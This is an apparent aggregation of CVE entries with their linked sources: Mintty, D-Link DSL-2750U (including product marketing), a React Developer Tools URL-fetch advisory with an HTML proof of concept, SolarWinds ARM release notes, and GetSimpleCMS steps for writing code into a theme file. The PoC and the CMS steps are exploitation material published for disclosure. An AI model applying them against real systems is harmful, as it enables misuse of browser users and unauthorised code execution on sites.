Terminal character injection in Mintty before 3.6.3 allows code execution via unescaped output to the terminal.

CVE-2022-47583: "[31m"?! ANSI Terminal security in 2023 and finding 10 CVEs

** UNSUPPORTED WHEN ASSIGNED ** D-Link (Non-US) DSL-2750U N300 ADSL2+ and (Non-US) DSL-2730U N150 ADSL2+ are vulnerable to Incorrect Access Control. The UART/Serial interface on the PCB, provides log output and a root terminal without proper access control.

A versatile, high-performance modem and router combination for the home or small office.

*   Latest ADSL2/2+ standards provide internet transmission of up to 24 Mbps downstream, 1 Mbps upstream
*   Compatible with older 802.11g/b devices
*   Switchable WAN/LAN Port
*   USB 2.0 port for connecting a 3G USB modem  
    

*   Latest ADSL2/2+ standards provide internet transmission of up to 24 Mbps downstream, 1 Mbps upstream
*   Compatible with older 802.11g/b devices
*   Switchable WAN/LAN Port
*   USB 2.0 port for connecting a 3G USB modem  
    

**Specifications**

WiFi (2.4GHz)

2x2 11n

Antenna

2.4G: External / 5dBi\*2

LAN

4 x Fast Ethernet (1 switchable WAN)

Product

ADSL

USB

1 x USB 2.0

Wireless Speed

N300

**Reliable Wireless Connection**

The DSL-2750U Wireless N 300 ADSL2+ Modem Router is a versatile, high-performance router for home and the small office. With integrated ADSL2/2+  
supporting download speeds up to 24 Mbps, firewall protection, Quality of Service (QoS), 802.11n wireless LAN, and 4 Ethernet switch ports, this router  
provides all the functions that a home or small office needs to establish a secure and high-speed link to the internet.

**Enhanced Features**

The Wireless N 300 ADSL2+ Modem Router oﬀers Quality of Service (QoS), which allows priority  queues to enable a group of home or office users to experience a smooth network connection  without worrying about traffic congestion. Virtual server allows users to forward ports for  remote access. In addition, it includes four Ethernet ports for connecting PCs and other devices,  making the DSL-2750U a logical choice for users who want a versatile and fast Wi-Fi router.

CVE-2023-46033: Wireless N 300 ADSL2+ Modem Router DSL-2750U

The React Developer Tools extension registers a message listener with window.addEventListener('message', <listener>) in a content script that is accessible to any webpage that is active in the browser. Within the listener is code that requests a URL derived from the received message via fetch(). The URL is not validated or sanitised before it is fetched, thus allowing a malicious web page to arbitrarily fetch URL’s via the victim's browser.

**Disclosure Status**

I have disclosed this to the maintainer, who issued a fix in version 4.28.4

**Commits**

https://github.com/facebook/react/commit/94d5b5b2bf5204ebd289a113989c0e2c51b626ef https://github.com/facebook/react/pull/27417/commits/c4db7be6b050fd36e3d7e1218d31d6b61f6b007d

**Technical Details:**

The React Developer Tools extension registers a message listener with window.addEventListener('message', <listener>) in a content script that is accessible to any webpage that is active in the browser. Within the listener is code that requests a URL derived from the received message via fetch(). The URL is not validated or sanitised before it is fetched, thus allowing a malicious web page to arbitrarily fetch URL’s via the victim's browser.

Because the content of the response is not returned to the malicious webpage, the impact of this issue is limited, i.e, sensitive resources available only to the victim cannot be retrieved. However, this could be used to generate clicks, and therefore revenue, for malicious actors, or be used along with other browsers for a Distributed Denial of Service (DDoS) without the victims’ knowledge or consent.

The code snippet below (shortened for brevity) shows the message listener code from the Content Script extracting the URL from the potentially tainted message received, then using the arbitrary URL directly in a fetch call shortly after.

window.addEventListener('message', function onMessage({data, source}) {
  if (source !== window || !data) {
    return;
  }
  switch (data.source) {
    ...
    case 'react-devtools-extension':
      if (data.payload?.type \=== 'fetch-file-with-cache') {
        const url \= data.payload.url; // URL from malicious webpage

        ...

        fetch(url, {cache: 'force-cache'}).then( // URL used in fetch
          response \=> {
            if (response.ok) {
              response
                .text()
                .then(text \=> resolve(text))
                .catch(error \=> reject(null));
            } else {
              reject(null);
            }
          },
          error \=> reject(null),
        );
      }
      break;
    ...

**PoC**

In the proof-of-concept React application below, the standard postMessage() API is used to send a crafted message to trigger the above switch statement when a button is clicked. Note the source attribute in the message is react-devtools-extension and the type is fetch-file-with-cache.

<!DOCTYPE html\>
<html\>
<head\>
  <script src\="https://unpkg.com/react@18/umd/react.development.js" crossorigin\></script\>
  <script src\="https://unpkg.com/react-dom@18/umd/react-dom.development.js" crossorigin\></script\>
  <script src\="https://unpkg.com/@babel/standalone/babel.min.js"\></script\>
</head\>
<body\>

<div id\="mydiv"\></div\>

<script type\="text/babel"\>
  function Hello() {
    return <h1\>Hello World!</h1\>;
  }

  const container \= document.getElementById('mydiv');
  const root \= ReactDOM.createRoot(container);
  root.render(<Hello /\>)
</script\>

<script\>
  function sendBrowserMsg() {
    let msg \= {
      source: 'react-devtools-extension',
      payload: {
        type: 'fetch-file-with-cache',
        url: 'https://www.google.com'
      }
    }
    console.log(\`Sending msg from browser: ${JSON.stringify(msg)}\`);
    postMessage(msg, "\*");
  }
</script\>

<form\>
  <button type\="button" id\="submit" onClick\="sendBrowserMsg()"\>Go!</button\>
</form\>

</body\>
</html\>

In reality, it’s likely that the malicious web page would automatically send messages to the extension without the need for user interaction.

CVE-2023-5654: React Developer Tools v4.27.8 Arbitrary URL Fetch via Malicious Web Page

The SolarWinds Access Rights Manager was susceptible to Privilege Escalation Vulnerability. This vulnerability allows users to abuse incorrect folder permission resulting in Privilege Escalation.

CVE-2023-35181

The SolarWinds Access Rights Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows authenticated users to abuse SolarWinds ARM API.

CVE-2023-35180

The SolarWinds Access Rights Manager was susceptible to Privilege Escalation Vulnerability. This vulnerability allows authenticated users to abuse local resources to Privilege Escalation.

CVE-2023-35183

The SolarWinds Access Rights Manager was susceptible to a Directory Traversal Remote Code Vulnerability. This vulnerability allows an unauthenticated user to achieve the Remote Code Execution.

CVE-2023-35187

The SolarWinds Access Rights Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows an authenticated user to abuse SolarWinds service resulting in remote code execution.

Release date: October 18, 2023

Access Rights Manager 2023.2.1 is a service release providing bug and security fixes for release 2023.2. For information about the 2023.2 release, including EOL notices and upgrade information, see Access Rights Manager 2023.2 Release Notes.

**Fixes**

 

Case number

Description

01385586

A OneDrive scan no longer fails when enabled.

01331492

AD Logga now initializes properly and no longer generates errors.

N/A

An issue flooding AD Logga with random log files is resolved.

01386041

A user logon password is no longer saved as plain text in memory.

N/A

You can now enable or disable SID and GUID in the Rich client.

N/A

An HTTP failure error no longer displays when performing a Directories File system permissions analysis.

N/A

AD Logga now initiates properly and no longer generates an error.

Return to top

**CVEs**

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2023-35180

SolarWinds Access Rights Manager Deserialization of Untrusted Data Remote Code Execution Vulnerability

The SolarWinds Access Rights Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows authenticated users to abuse SolarWinds ARM API.

8.0 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-35181

SolarWinds Access Rights Manager Incorrect Default Permissions Local Privilege Escalation Vulnerability

The SolarWinds Access Rights Manager was susceptible to Privilege Escalation Vulnerability. This vulnerability allows users to abuse incorrect folder permission resulting in Privilege Escalation.

7.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-35182

SolarWinds ARM Deserialization of Untrusted Data Remote Code Execution Vulnerability

The SolarWinds Access Rights Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability can be abused by unauthenticated users on SolarWinds ARM Server.

8.8 High

Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day InitiativeTrend Micro Zero Day Initiative. 

CVE-2023-35183

SolarWinds Access Rights Manager Incorrect Default Permissions Local Privilege Escalation Vulnerability

The SolarWinds Access Rights Manager was susceptible to Privilege Escalation Vulnerability. This vulnerability allows authenticated users to abuse local resources to Privilege Escalation.

7.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-35184

SolarWinds ARM Deserialization of Untrusted Data Remote Code Execution Vulnerability

The SolarWinds Access Rights Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows an unauthenticated user to abuse a SolarWinds service resulting in a remote code execution. 

8.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative 

CVE-2023-35185

SolarWinds Access Rights Manager Directory Traversal Remote Code Execution Vulnerability

The SolarWinds Access Rights Manager was susceptible to a Directory Traversal Remote Code Vulnerability using SYSTEM privileges.

8.8 High

Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative 

CVE-2023-35186

SolarWinds ARM Deserialization of Untrusted Data Remote Code Execution Vulnerability

The SolarWinds Access Rights Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows an authenticated user to abuse SolarWinds service resulting in remote code execution.

8.0 High 

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-35187

SolarWinds Access Rights Manager Directory Traversal Remote Code Execution Vulnerability

The SolarWinds Access Rights Manager was susceptible to a Directory Traversal Remote Code Vulnerability using SYSTEM privileges.

8.8 High

Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative

Return to top

**Legal notices**

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2023-35186: ARM 2023.2.1 Release Notes

The SolarWinds Access Rights Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability can be abused by unauthenticated users on SolarWinds ARM Server.

CVE-2023-35182

An issue in GetSimpleCMS v.3.4.0a allows a remote attacker to execute arbitrary code via a crafted payload to the phpinfo().

1.GetSimple Version：3.4.0a

2.Download address:

https://codeload.github.com/GetSimpleCMS/GetSimpleCMS/zip/refs/heads/master

3.Vulnerability type: File write vulnerability

4.The following page is displayed in the background：

/admin/theme-edit.php?t=Innovation&f=functions.php

5.Write malicious code, such as phpinfo, in the functions.php file 

Click save changes

6.Open file location：/theme/Innovation/functions.php

Source

CVE